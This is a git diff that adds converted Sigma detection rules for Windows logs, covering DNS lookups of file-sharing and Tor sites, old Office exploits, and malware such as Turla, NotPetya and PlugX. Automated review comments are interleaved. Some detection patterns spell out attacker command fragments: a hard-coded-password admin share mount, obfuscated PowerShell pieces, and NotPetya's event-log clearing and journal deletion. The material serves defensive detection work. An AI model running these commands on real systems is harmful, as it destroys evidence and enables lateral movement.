+description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes
+references:
+ - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/16
+tags:
+ - attack.exfiltration
+ - attack.t1567.002
+logsource:
+ product: windows
+ service: dns-client
+ definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
+detection:
+ dns_client:
+ Channel: Microsoft-Windows-DNS Client Events/Operational
+ selection:
+ EventID: 3008
+ QueryName|contains: .anonfiles.com
+ condition: dns_client and selection
+falsepositives:
+ - Rare legitimate access to anonfiles.com
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml
new file mode 100644
index 000000000..dc63fcf36
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_mega_nz.yml
@@ -0,0 +1,29 @@
+title: DNS Query To MEGA Hosting Website - DNS Client
+id: 66474410-b883-415f-9f8d-75345a0a66a6
+related:
+ - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3
+ type: similar
+status: test
+description: Detects DNS queries for subdomains related to MEGA sharing website
+references:
+ - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/16
+tags:
+ - attack.exfiltration
+ - attack.t1567.002
+logsource:
+ product: windows
+ service: dns-client
+ definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
+detection:
+ dns_client:
+ Channel: Microsoft-Windows-DNS Client Events/Operational
+ selection:
+ EventID: 3008
+ QueryName|contains: userstorage.mega.co.nz
+ condition: dns_client and selection
+falsepositives:
+ - Legitimate DNS queries and usage of Mega
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml
new file mode 100644
index 000000000..651ec29be
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_tor_onion.yml
@@ -0,0 +1,29 @@
+title: Query Tor Onion Address - DNS Client
+id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2
+related:
+ - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544
+ type: similar
+status: test
+description: Detects DNS resolution of an .onion address related to Tor routing networks
+references:
+ - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/02/20
+tags:
+ - attack.command_and_control
+ - attack.t1090.003
+logsource:
+ product: windows
+ service: dns-client
+ definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
+detection:
+ dns_client:
+ Channel: Microsoft-Windows-DNS Client Events/Operational
+ selection:
+ EventID: 3008
+ QueryName|contains: .onion
+ condition: dns_client and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml
new file mode 100644
index 000000000..26f404283
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/dns_client/win_dns_client_ufile_io.yml
@@ -0,0 +1,30 @@
+title: DNS Query To Ufile.io - DNS Client
+id: 090ffaad-c01a-4879-850c-6d57da98452d
+related:
+ - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b
+ type: similar
+status: experimental
+description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration
+references:
+ - https://thedfirreport.com/2021/12/13/diavol-ransomware/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/16
+modified: 2023/09/18
+tags:
+ - attack.exfiltration
+ - attack.t1567.002
+logsource:
+ product: windows
+ service: dns-client
+ definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.'
+detection:
+ dns_client:
+ Channel: Microsoft-Windows-DNS Client Events/Operational
+ selection:
+ EventID: 3008
+ QueryName|contains: ufile.io
+ condition: dns_client and selection
+falsepositives:
+ - DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml
new file mode 100644
index 000000000..ffca67d76
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml
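Review bot: `QueryName|contains: ufile.io` carries no leading dot, unlike `.anonfiles.com` and `.onion` in the sibling dns-client rules in this patch, so any query name that merely contains that substring in a longer label matches as well. If that breadth is intended (the low level and the false-positive note suggest it is), a one-line comment on the selection would save the next reader from "fixing" it, e.g. `QueryName|contains: ufile.io # intentionally broad: also catches subdomains and the bare apex`; if not, an `|endswith` modifier would narrow it. Either way the choice should be recorded where the rule is authored rather than in this converted copy.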
@@ -0,0 +1,24 @@
+title: Failed DNS Zone Transfer
+id: 6d444368-6da1-43fe-b2fc-44202430480e
+status: experimental
+description: Detects when a DNS zone transfer failed.
+references:
+ - https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp
+author: Zach Mathis
+date: 2023/05/24
+tags:
+ - attack.reconnaissance
+ - attack.t1590.002
+logsource:
+ product: windows
+ service: dns-server
+detection:
+ dns_server:
+ Channel: DNS Server
+ selection:
+ EventID: 6004 # The DNS server received a zone transfer request from %1 for a non-existent or non-authoritative zone %2.
+ condition: dns_server and selection
+falsepositives:
+ - Unlikely
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml
new file mode 100644
index 000000000..98dab8c3f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml
@@ -0,0 +1,35 @@
+title: DNS Server Error Failed Loading the ServerLevelPluginDLL
+id: cbe51394-cd93-4473-b555-edf0144952d9
+related:
+ - id: e61e8a88-59a9-451c-874e-70fcc9740d67
+ type: derived
+ - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
+ type: derived
+status: test
+description: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
+references:
+ - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
+ - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx
+ - https://twitter.com/gentilkiwi/status/861641945944391680
+author: Florian Roth (Nextron Systems)
+date: 2017/05/08
+modified: 2023/02/05
+tags:
+ - attack.defense_evasion
+ - attack.t1574.002
+logsource:
+ product: windows
+ service: dns-server
+detection:
+ dns_server:
+ Channel: DNS Server
+ selection:
+ EventID:
+ - 150
+ - 770
+ - 771
+ condition: dns_server and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml b/tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml
new file mode 100644
index 000000000..2bdcf202b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/driverframeworks/win_usb_device_plugged.yml
@@ -0,0 +1,30 @@
+title: USB Device Plugged
+id: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4
+status: test
+description: Detects plugged/unplugged USB devices
+references:
+ - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/
+ - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
+author: Florian Roth (Nextron Systems)
+date: 2017/11/09
+modified: 2021/11/30
+tags:
+ - attack.initial_access
+ - attack.t1200
+logsource:
+ product: windows
+ service: driver-framework
+ definition: Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational eventlog
+detection:
+ driver_framework:
+ Channel: Microsoft-Windows-DriverFrameworks-UserMode/Operational
+ selection:
+ EventID:
+ - 2003 # Loading drivers
+ - 2100 # Pnp or power management
+ - 2102 # Pnp or power management
+ condition: driver_framework and selection
+falsepositives:
+ - Legitimate administrative activity
+level: low
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml
new file mode 100644
index 000000000..7f11bd5e4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml
@@ -0,0 +1,38 @@ +title: ZxShell Malware +id: f0b70adb-0075-43b0-9745-e82a1c608fcc +status: test +description: Detects a ZxShell start by the called and well-known function name +references: + - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100 + - https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +date: 2017/07/20 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1059.003 + - attack.defense_evasion + - attack.t1218.011 + - attack.s0412 + - attack.g0001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - zxFunction + - RemoteDiskXXXXX + NewProcessName|endswith: \rundll32.exe + condition: process_creation and selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml new file mode 100644 index 000000000..a5372e7bc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml 
@@ -0,0 +1,36 @@ +title: Turla Group Lateral Movement +id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f +status: test +description: Detects automated lateral movement by Turla group +references: + - https://securelist.com/the-epic-turla-operation/65545/ +author: Markus Neis +date: 2017/11/07 +modified: 2022/10/09 +tags: + - attack.g0010 + - attack.execution + - attack.t1059 + - attack.lateral_movement + - attack.t1021.002 + - attack.discovery + - attack.t1083 + - attack.t1135 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine: + - net use \\\\%DomainController%\C$ "P@ssw0rd" * + - dir c:\\*.doc* /s + - dir %TEMP%\\*.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml new file mode 100644 index 000000000..2bf684be1 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml 
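Review bot: In `selection`, `CommandLine:` carries no modifier, so each entry is an exact (wildcard-aware) match on the whole command line, and the first entry only fires when the literal placeholder `%DomainController%` is present; the referenced report appears to use that token as a stand-in for the real controller name, in which case the entry would not match actual activity. Matching on the stable fragments instead, e.g. `CommandLine|contains|all:` with `- \C$ "P@ssw0rd"`, would be more robust. The other two entries are exact as well and miss small variations in spacing or drive letter, so `|contains` is worth considering for them too.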
@@ -0,0 +1,37 @@ +title: Turla Group Commands May 2020 +id: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c +status: test +description: Detects commands used by Turla group as reported by ESET in May 2020 +references: + - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf +author: Florian Roth (Nextron Systems) +date: 2020/05/26 +modified: 2021/11/27 +tags: + - attack.g0010 + - attack.execution + - attack.t1059.001 + - attack.t1053.005 + - attack.t1027 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cli_1: + CommandLine|contains: + - tracert -h 10 yahoo.com + - .WSqmCons))|iex; + - Fr`omBa`se6`4Str`ing + selection_cli_2: + CommandLine|contains|all: + - net use https://docs.live.net + - '@aol.co.uk' + condition: process_creation and (1 of selection_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml new file mode 100644 index 000000000..fe8565135 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml 
@@ -0,0 +1,30 @@ +title: Exploit for CVE-2015-1641 +id: 7993792c-5ce2-4475-a3db-a3a5539827ef +status: stable +description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 +references: + - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/ + - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 +author: Florian Roth (Nextron Systems) +date: 2018/02/22 +modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1036.005 + - cve.2015.1641 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \WINWORD.EXE + NewProcessName|endswith: \MicroScMgmt.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml new file mode 100644 index 000000000..e13c6ca95 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml 
@@ -0,0 +1,32 @@ +title: Exploit for CVE-2017-0261 +id: 864403a1-36c9-40a2-a982-4c9a45f7d833 +status: test +description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 +references: + - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html +author: Florian Roth (Nextron Systems) +date: 2018/02/22 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1203 + - attack.t1204.002 + - attack.initial_access + - attack.t1566.001 + - cve.2017.0261 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \WINWORD.EXE + NewProcessName|contains: \FLTLDR.exe + condition: process_creation and selection +falsepositives: + - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml new file mode 100644 index 000000000..1ed94956f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml 
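Review bot: `selection` uses `NewProcessName|contains: \FLTLDR.exe` while the sibling rules in this commit (CVE-2015-1641, CVE-2017-8759) anchor the image name with `|endswith`; `contains` also matches when `\FLTLDR.exe` appears in the middle of the path. If the looser match is not intentional, `NewProcessName|endswith: \FLTLDR.exe` keeps the rule consistent with its neighbours.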
@@ -0,0 +1,34 @@ +title: Droppers Exploiting CVE-2017-11882 +id: 678eb5f4-8597-4be6-8be7-905e4234b53a +status: stable +description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe +references: + - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 + - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw +author: Florian Roth (Nextron Systems) +date: 2017/11/23 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1203 + - attack.t1204.002 + - attack.initial_access + - attack.t1566.001 + - cve.2017.11882 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \EQNEDT32.EXE + condition: process_creation and selection +fields: + - CommandLine +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml new file mode 100644 index 000000000..6f92a3317 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml 
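Review bot: The second `references` entry is a Gmail redirect wrapper (`https://www.google.com/url?...`) carrying tracking parameters that may stop resolving; the actual source is the `q=` target. Replace it with the direct link `https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about`.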
@@ -0,0 +1,33 @@ +title: Exploit for CVE-2017-8759 +id: fdd84c68-a1f6-47c9-9477-920584f94905 +status: test +description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 +references: + - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 + - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 +author: Florian Roth (Nextron Systems) +date: 2017/09/15 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1203 + - attack.t1204.002 + - attack.initial_access + - attack.t1566.001 + - cve.2017.8759 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: \WINWORD.EXE + NewProcessName|endswith: \csc.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml new file mode 100644 index 000000000..a6014b1e8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml 
@@ -0,0 +1,34 @@ +title: Adwind RAT / JRAT +id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 +status: test +description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +references: + - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 + - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf +author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +date: 2017/11/10 +modified: 2022/10/09 +tags: + - attack.execution + - attack.t1059.005 + - attack.t1059.007 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains|all: + - \AppData\Roaming\Oracle + - \java + - '.exe ' + - CommandLine|contains|all: + - cscript.exe + - Retrive + - '.vbs ' + condition: process_creation and selection +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml new file mode 100644 index 000000000..b358483bc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml 
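Review bot: This rule has no `falsepositives` section, unlike every other rule in this commit, so an analyst triaging a hit has no stated expectation of benign matches. Add `falsepositives:` with `- Unknown` before `level: high`, or a concrete entry if legitimate Java applications under `\AppData\Roaming\Oracle` are known in the environment. The second `selection` entry (`cscript.exe`, `Retrive`, `'.vbs '`) appears to rely on the literal misspelling `Retrive`; a short comment such as `# intentional misspelling as seen in the dropper — do not "fix"` would stop a later maintainer from correcting it.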
@@ -0,0 +1,34 @@ +title: Fireball Archer Install +id: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d +status: test +description: Detects Archer malware invocation via rundll32 +references: + - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/ + - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100 +author: Florian Roth (Nextron Systems) +date: 2017/06/03 +modified: 2021/11/27 +tags: + - attack.execution + - attack.defense_evasion + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - rundll32.exe + - InstallArcherSvc + condition: process_creation and selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml new file mode 100644 index 000000000..2298b7966 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml 
@@ -0,0 +1,42 @@ +title: NotPetya Ransomware Activity +id: 79aeeb41-8156-4fac-a0cd-076495ab82a1 +status: test +description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil +references: + - https://securelist.com/schroedingers-petya/78870/ + - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 +author: Florian Roth (Nextron Systems), Tom Ueltschi +date: 2019/01/16 +modified: 2022/12/15 +tags: + - attack.defense_evasion + - attack.t1218.011 + - attack.t1070.001 + - attack.credential_access + - attack.t1003.001 + - car.2016-04-002 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_specific_pattern: + CommandLine|contains: + - 'wevtutil cl Application & fsutil usn deletejournal /D C:' + - dllhost.dat %WINDIR%\ransoms + selection_rundll32: + CommandLine|endswith: + - .dat,#1 + - '.dat #1' # Sysmon removes comma + - .zip.dll",#1 + NewProcessName|endswith: \rundll32.exe + selection_perfc_keyword: + - \perfc.dat + condition: process_creation and (1 of selection_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml new file mode 100644 index 000000000..72958fbd3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml 
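Review bot: The inline comment `# Sysmon removes comma` on the `'.dat #1'` entry in `selection_rundll32` explains Sysmon behaviour, but this converted rule reads `Channel: Security` / `EventID: 4688`, where the command line comes from the Security auditing provider rather than Sysmon; keeping the comma-less variant is reasonable, but the comment should say why it applies here, e.g. `# also match the comma-less form recorded by some providers`. `selection_perfc_keyword` is a bare value list, i.e. a keyword (full-text) search rather than a field match, so whether it matches depends on the backend indexing the whole 4688 event; if `CommandLine|contains: \perfc.dat` is the intent, state it explicitly.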
@@ -0,0 +1,101 @@ +title: Potential PlugX Activity +id: aeab5ec5-be14-471a-80e8-e344418305c2 +status: test +description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location +references: + - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ + - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ +author: Florian Roth (Nextron Systems) +date: 2017/06/12 +modified: 2023/02/03 +tags: + - attack.s0013 + - attack.defense_evasion + - attack.t1574.002 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cammute: + NewProcessName|endswith: \CamMute.exe + filter_cammute: + NewProcessName|contains: + - \Lenovo\Communication Utility\ + - \Lenovo\Communications Utility\ + selection_chrome_frame: + NewProcessName|endswith: \chrome_frame_helper.exe + filter_chrome_frame: + NewProcessName|contains: \Google\Chrome\application\ + selection_devemu: + NewProcessName|endswith: \dvcemumanager.exe + filter_devemu: + NewProcessName|contains: \Microsoft Device Emulator\ + selection_gadget: + NewProcessName|endswith: \Gadget.exe + filter_gadget: + NewProcessName|contains: \Windows Media Player\ + selection_hcc: + NewProcessName|endswith: \hcc.exe + filter_hcc: + NewProcessName|contains: \HTML Help Workshop\ + selection_hkcmd: + NewProcessName|endswith: \hkcmd.exe + filter_hkcmd: + NewProcessName|contains: + - \System32\ + - \SysNative\ + - \SysWow64\ + selection_mc: + NewProcessName|endswith: \Mc.exe + filter_mc: + NewProcessName|contains: + - \Microsoft Visual Studio + - \Microsoft SDK + - \Windows Kit + selection_msmpeng: + NewProcessName|endswith: \MsMpEng.exe + filter_msmpeng: + NewProcessName|contains: + - \Microsoft Security Client\ + - \Windows Defender\ + - \AntiMalware\ + selection_msseces: + NewProcessName|endswith: 
\msseces.exe + filter_msseces: + NewProcessName|contains: + - \Microsoft Security Center\ + - \Microsoft Security Client\ + - \Microsoft Security Essentials\ + selection_oinfo: + NewProcessName|endswith: \OInfoP11.exe + filter_oinfo: + NewProcessName|contains: \Common Files\Microsoft Shared\ + selection_oleview: + NewProcessName|endswith: \OleView.exe + filter_oleview: + NewProcessName|contains: + - \Microsoft Visual Studio + - \Microsoft SDK + - \Windows Kit + - \Windows Resource Kit\ + selection_rc: + NewProcessName|endswith: \rc.exe + filter_rc: + NewProcessName|contains: + - \Microsoft Visual Studio + - \Microsoft SDK + - \Windows Kit + - \Windows Resource Kit\ + - \Microsoft.NET\ + condition: process_creation and (( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml new file mode 100644 index 000000000..500915c03 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml 
@@ -0,0 +1,30 @@ +title: StoneDrill Service Install +id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6 +status: test +description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky +references: + - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ +author: Florian Roth (Nextron Systems) +date: 2017/03/07 +modified: 2021/11/30 +tags: + - attack.persistence + - attack.g0064 + - attack.t1543.003 + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: NtsSrv + ImagePath|endswith: ' LocalService' + condition: system and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml new file mode 100644 index 000000000..00656f3da --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml 
